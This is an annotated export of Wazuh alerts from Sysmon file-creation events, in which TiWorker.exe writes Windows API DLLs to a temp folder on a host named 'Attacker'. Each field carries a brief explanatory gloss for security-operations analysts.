data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.226 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.226 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.226
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.226
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.524+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.524+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.694666
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2312480Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260610
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.231 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.228 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-1.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.228
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.533+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.533+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.697772
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2331969Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260611
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.231 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.231 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.552+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.552+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.700866
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2352253Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260612
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.233 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.233 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-1.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.564+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.564+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.703960
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2373860Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260613
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.235 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-delayload-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.235 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.235
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-delayload-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.235
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.565+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.565+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.707070
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2613251Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260622
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.260 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-core-file-l2-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.260 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.260
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-core-file-l2-1-1.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.260
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.580+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.580+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
